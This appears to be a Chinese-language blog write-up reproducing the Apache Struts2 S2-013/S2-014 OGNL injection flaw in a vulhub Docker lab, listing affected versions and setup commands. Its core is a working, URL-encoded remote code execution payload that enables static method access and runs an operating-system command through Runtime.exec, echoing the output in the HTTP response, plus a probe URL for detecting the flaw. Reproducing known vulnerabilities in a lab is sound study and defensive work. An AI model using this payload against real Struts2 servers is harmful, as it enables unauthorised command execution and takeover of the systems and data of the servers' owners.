S2-013/S2-014 遠程代碼執行漏洞

前言

S2-014 是對 S2-013 修復的加強,在 S2-013 修復的代碼中忽略了 ${ognl_exp} OGNL 表達式執行的方式,因此 S2-014 是對其的補丁加強。

影響版本

2.0.0 - 2.3.14.1

環境搭建

cd vulhub/struts2/s2-013

docker-compose build && docker-compose up -d

漏洞復現

測試是否存在漏洞

http://yourIP:8080/link.action?a=%24{1%2b1}

已經解析成2了

任意命令執行POC:

http://yourIP:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章